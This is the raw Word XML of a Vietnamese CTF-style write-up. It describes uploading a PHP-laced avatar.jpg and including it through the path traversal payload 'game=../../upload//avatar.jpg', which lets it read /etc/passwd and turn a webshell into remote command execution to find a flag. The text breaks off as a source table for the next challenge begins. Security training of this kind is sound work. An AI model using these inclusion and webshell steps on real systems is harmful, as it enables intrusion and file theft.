        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF619D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">* Ý tưởng </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B43C56" w14:textId="5482BF5E" w:rsidR="00F13951" w:rsidRPr="00612794" w:rsidRDefault="00E20FA3" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Lợi dùng khả năng file dựa vào nội dung của nó mà không liên quan để đuôi file để thực thi file Inclusion bằng cách </w:t>
      </w:r>
      <w:r w:rsidR="00C26E64" w:rsidRPr="00C26E64">
        <w:t>tạo một file avatar.jpg chứa mã PHP độc hại, chẳng hạn như , rồi upload thông qua chức năng avatar. File này sẽ được lưu tại đường dẫn /var/www/</w:t>
      </w:r>
      <w:r w:rsidR="00C26E64">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C26E64" w:rsidRPr="00C26E64">
        <w:t xml:space="preserve">html/upload/avatar.jpg. Sau đó, bằng cách truyền tham số game=../../upload//avatar.jpg vào URL, ứng dụng sẽ thực hiện include() file đó. Do PHP xử lý file theo nội dung thay vì phần mở rộng, đoạn mã PHP bên trong avatar.jpg sẽ được thực </w:t>
      </w:r>
      <w:r w:rsidR="00C26E64">
        <w:t>thi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317B8064" w14:textId="77777777" w:rsidR="00F13951" w:rsidRPr="00184ED1" w:rsidRDefault="00F13951" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00184ED1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>* Khai thác</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F361D74" w14:textId="5C97A2C2" w:rsidR="00F13951" w:rsidRDefault="00E20FA3" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Truy cập vào chức năng </w:t>
      </w:r>
      <w:r w:rsidR="00C26E64">
        <w:t>game</w:t>
      </w:r>
      <w:r w:rsidR="003D3FED">
        <w:t xml:space="preserve"> (vị trí sử dụng hàm include())</w:t>
      </w:r>
      <w:r w:rsidR="00C26E64">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5B3A7A" w14:textId="77777777" w:rsidR="009011D5" w:rsidRDefault="009011D5" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001621EB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B3AFB9E" wp14:editId="10D3B724">
            <wp:extent cx="5731510" cy="1380490"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1543611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1942" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1380490"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B6F8FB" w14:textId="51F92313" w:rsidR="00C26E64" w:rsidRDefault="00C26E64" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Thực hiện đọc file </w:t>
      </w:r>
      <w:r w:rsidR="003D3FED">
        <w:t>/etc/passwd:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDF0E78" w14:textId="77777777" w:rsidR="009011D5" w:rsidRDefault="009011D5" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001621EB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25259248" wp14:editId="2D69A275">
            <wp:extent cx="5731510" cy="1113790"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="73456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6458" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1113790"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C09D0FF" w14:textId="08699D29" w:rsidR="004E29E2" w:rsidRPr="004E29E2" w:rsidRDefault="004E29E2" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Ứ</w:t>
      </w:r>
      <w:r w:rsidRPr="004E29E2">
        <w:t xml:space="preserve">ng dụng </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">web đã </w:t>
      </w:r>
      <w:r w:rsidRPr="004E29E2">
        <w:t xml:space="preserve">thực hiện include() trên file </w:t>
      </w:r>
      <w:r>
        <w:t>/etc/passwd</w:t>
      </w:r>
      <w:r w:rsidRPr="004E29E2">
        <w:t xml:space="preserve">. Kết quả là nội dung của /etc/passwd được hiển thị ngay trên giao diện </w:t>
      </w:r>
      <w:r>
        <w:t>web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7458FA8B" w14:textId="22FA04F8" w:rsidR="004E29E2" w:rsidRDefault="004E29E2" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tiếp đó thực hiện upload 1 file ảnh chứa </w:t>
      </w:r>
      <w:r w:rsidR="009B6B93">
        <w:t>php</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> để chèn vào file </w:t>
      </w:r>
      <w:r w:rsidR="009B6B93" w:rsidRPr="009B6B93">
        <w:t>avatar.</w:t>
      </w:r>
      <w:r w:rsidR="009B6B93">
        <w:t>jpg:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6ADE91" w14:textId="0449F5AD" w:rsidR="004535F1" w:rsidRDefault="004535F1" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="004535F1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2462AB37" wp14:editId="4AA69DF1">
            <wp:extent cx="5731510" cy="2846705"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="9418687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8727" name="Picture 1" descr="A screenshot of a computer program&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2846705"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E964E6F" w14:textId="77777777" w:rsidR="009B6B93" w:rsidRDefault="009B6B93" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58E620A6" w14:textId="389E2155" w:rsidR="009B6B93" w:rsidRPr="001621EB" w:rsidRDefault="009B6B93" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Sử dụng </w:t>
      </w:r>
      <w:r w:rsidRPr="009B6B93">
        <w:t xml:space="preserve">kỹ thuật Path Traversal, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">đưa payload </w:t>
      </w:r>
      <w:r w:rsidRPr="009B6B93">
        <w:t xml:space="preserve">game=../../upload//avatar.jpg. Khi ứng dụng thực hiện include() trên file này, đoạn mã PHP bên trong sẽ được thực </w:t>
      </w:r>
      <w:r>
        <w:t>thi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38256332" w14:textId="0894FC8B" w:rsidR="009011D5" w:rsidRDefault="005110B1" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="005110B1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56A92115" wp14:editId="721CBD98">
            <wp:extent cx="5731510" cy="1635125"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="938829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29411" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1635125"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="11598A3A" w14:textId="7F1335AE" w:rsidR="009B6B93" w:rsidRDefault="009B6B93" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Thay thế phpinfo() bằng hàm system() để thực thi rce:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EC6A00" w14:textId="343F11AB" w:rsidR="00EA65C2" w:rsidRDefault="00EA65C2" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00EA65C2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7295A070" wp14:editId="6FC6107A">
            <wp:extent cx="5731510" cy="2443480"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="17158671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67124" name="Picture 1" descr="A screenshot of a computer screen&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2443480"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="494C964C" w14:textId="589D30CC" w:rsidR="001B0CAB" w:rsidRPr="001B0CAB" w:rsidRDefault="001B0CAB" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Truy cập thành công nhưng vì webshell được gọi trong tham số game ở phương thức GET nên không thể đưa ?cmd vào:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B470BB4" w14:textId="535732CC" w:rsidR="00CE7E8E" w:rsidRDefault="00CE7E8E" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00CE7E8E">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53449C77" wp14:editId="2AB74DB9">
            <wp:extent cx="5731510" cy="937260"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1546835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35110" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId30"/>
                    <a:srcRect b="11138"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="937260"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A21C33" w14:textId="43F771C6" w:rsidR="001B0CAB" w:rsidRPr="001B0CAB" w:rsidRDefault="001B0CAB" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Chỉnh sửa lệnh php để tìm kiếm flag:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63ECDDCF" w14:textId="5B3A17A1" w:rsidR="00CE7E8E" w:rsidRDefault="00CE7E8E" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00CE7E8E">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5EA95015" wp14:editId="79717666">
            <wp:extent cx="5731510" cy="1996440"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="4187150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5075" name="Picture 1" descr="A screenshot of a computer screen&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId31"/>
                    <a:srcRect t="3335"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1996440"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="222C76F8" w14:textId="7941C29C" w:rsidR="001B0CAB" w:rsidRPr="001B0CAB" w:rsidRDefault="001B0CAB" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Sử dụng path traversal để đọc thông tin flag theo tên file đã được tìm thấy ở bước trên:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491A560D" w14:textId="05B19456" w:rsidR="00FE709E" w:rsidRDefault="00FE709E" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE709E">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08945810" wp14:editId="7A9696A0">
            <wp:extent cx="5731510" cy="941705"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="491863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63861" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="941705"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3322656F" w14:textId="77777777" w:rsidR="009A3CBF" w:rsidRDefault="009A3CBF" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D7383B" w14:textId="246AE00F" w:rsidR="009A3CBF" w:rsidRPr="00FF23DE" w:rsidRDefault="009A3CBF" w:rsidP="004F0B2A">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5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2894F066" w14:textId="77777777" w:rsidR="009A3CBF" w:rsidRDefault="009A3CBF" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Thông</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tin source code xử lý chính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586CD4" w:rsidRPr="00586CD4" w14:paraId="73AB10C5" w14:textId="77777777" w:rsidTr="00586CD4">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="497A7C38" w14:textId="77777777" w:rsidR="00586CD4" w:rsidRPr="00586CD4" w:rsidRDefault="00586CD4" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00586CD4">
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AFC3F17" w14:textId="77777777" w:rsidR="00586CD4" w:rsidRPr="00586CD4" w:rsidRDefault="00586CD4" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00586CD4">
              <w:t xml:space="preserve"> 2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A0D51E3" w14:textId="77777777" w:rsidR="00586CD4" w:rsidRPr="00586CD4" w:rsidRDefault="00586CD4" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00586CD4">
              <w:t xml:space="preserve"> 3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C0B471C" w14:textId="77777777" w:rsidR="00586CD4" w:rsidRPr="00586CD4" w:rsidRDefault="00586CD4" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00586CD4">
              <w:t xml:space="preserve"> 4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47B3C840" w14:textId="77777777" w:rsidR="00586CD4" w:rsidRPr="00586CD4" w:rsidRDefault="00586CD4" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00586CD4">
              <w:t xml:space="preserve"> 5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5716193D" w14:textId="77777777" w:rsidR="00586CD4" w:rsidRPr="00586CD4" w:rsidRDefault="00586CD4" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00586CD4">
              <w:t xml:space="preserve"> 6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05D318C6" w14:textId="77777777" w:rsidR="00586CD4" w:rsidRPr="00586CD4" w:rsidRDefault="00586CD4" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00586CD4">
              <w:t xml:space="preserve"> 7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E6A0EB8" w14:textId="77777777" w:rsidR="00586CD4" w:rsidRPr="00586CD4" w:rsidRDefault="00586CD4" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00586CD4">
              <w:t xml:space="preserve"> 8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15C35175" w14:textId="77777777" w:rsidR="00586CD4" w:rsidRPr="00586CD4" w:rsidRDefault="00586CD4" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00586CD4">
              <w:t xml:space="preserve"> 9</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0118BA38" w14:textId="77777777" w:rsidR="00586CD4" w:rsidRPr="00586CD4" w:rsidRDefault="00586CD4" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00586CD4">
              <w:t>10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CAC991D" w14:textId="77777777" w:rsidR="00586CD4" w:rsidRPr="00586CD4" w:rsidRDefault="00586CD4" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00586CD4">
              <w:t>11</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="747AABCD" w14:textId="77777777" w:rsidR="00586CD4" w:rsidRPr="00586CD4" w:rsidRDefault="00586CD4" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00586CD4">
              <w:t>12</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="211DBAA4" w14:textId="77777777" w:rsidR="00586CD4" w:rsidRPr="00586CD4" w:rsidRDefault="00586CD4" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00586CD4">
              <w:t>13</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C8DFBAD" w14:textId="77777777" w:rsidR="00586CD4" w:rsidRPr="00586CD4" w:rsidRDefault="00586CD4" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00586CD4">
              <w:t>14</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DFCC402" w14:textId="77777777" w:rsidR="00586CD4" w:rsidRPr="00586CD4" w:rsidRDefault="00586CD4" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00586CD4">
              <w:t>15</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24F8685B" w14:textId="77777777" w:rsidR="00586CD4" w:rsidRPr="00586CD4" w:rsidRDefault="00586CD4" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00586CD4">
              <w:t>16</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68C8268D" w14:textId="77777777" w:rsidR="00586CD4" w:rsidRPr="00586CD4" w:rsidRDefault="00586CD4" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00586CD4">
              <w:t>17</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="617BD19A" w14:textId="77777777" w:rsidR="00586CD4" w:rsidRPr="00586CD4" w:rsidRDefault="00586CD4" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00586CD4">
              <w:t>18</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6624EDBD" w14:textId="77777777" w:rsidR="00586CD4" w:rsidRPr="00586CD4" w:rsidRDefault="00586CD4" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00586CD4">
              <w:t>19</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31C161F9" w14:textId="77777777" w:rsidR="00586CD4" w:rsidRPr="00586CD4" w:rsidRDefault="00586CD4" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00586CD4">
              <w:t>20</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62D86007" w14:textId="77777777" w:rsidR="00586CD4" w:rsidRPr="00586CD4" w:rsidRDefault="00586CD4" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00586CD4">
              <w:t>21</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21E8CCD4" w14:textId="77777777" w:rsidR="00586CD4" w:rsidRPr="00586CD4" w:rsidRDefault="00586CD4" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00586CD4">
              <w:t>22</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B06A426" w14:textId="77777777" w:rsidR="00586CD4" w:rsidRPr="00586CD4" w:rsidRDefault="00586CD4" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00586CD4">
              <w:t>23</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48D43C6A" w14:textId="77777777" w:rsidR="00586CD4" w:rsidRPr="00586CD4" w:rsidRDefault="00586CD4" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00586CD4">
              <w:t>24</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="111E9D08" w14:textId="77777777" w:rsidR="00586CD4" w:rsidRPr="00586CD4" w:rsidRDefault="00586CD4" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00586CD4">
              <w:t>25</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E7AEC4F" w14:textId="77777777" w:rsidR="00586CD4" w:rsidRPr="00586CD4" w:rsidRDefault="00586CD4" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00586CD4">
              <w:t>26</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CC87994" w14:textId="77777777" w:rsidR="00586CD4" w:rsidRPr="00586CD4" w:rsidRDefault="00586CD4" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00586CD4">
              <w:t>27</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8707" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21ECE54E" w14:textId="77777777" w:rsidR="00586CD4" w:rsidRPr="00586CD4" w:rsidRDefault="00586CD4" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00586CD4">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>&lt;?php</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1825A034" w14:textId="77777777" w:rsidR="00586CD4" w:rsidRPr="00586CD4" w:rsidRDefault="00586CD4" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
